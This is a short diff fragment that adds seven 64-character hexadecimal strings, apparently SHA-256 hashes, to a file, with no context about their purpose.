+f04dc3c62b305cdb4d83d8df2caa2d37feeb0a86fb5a745df416bac62a3b9731
+f1a592208723a66fa51ce1bc35cbd6864e24011c6dc3bcd056346428e4e1c55d
+f4e3cfeeb4e10f61049a88527321af8c77d95349caf616e86d7ff4f5ba203e5f
+fa0ea232ab160a652fcbd8d6db8ffa09fd64bcb3228f000434d6a8e340aaf4cb
+fa94282e34901eba45720c4f89a0c820d32840ae49e53de8e75b2d6e78326074
+fca2ea3e471a0d612ce50abc8738085f076ad022f70f78c3f8c83d1b2ff7896b
+fd92e34675e5b0b8bfbc6b1f3a00a7652e67a162f1ea612f6e86cca846df76c5
\ No newline at end of file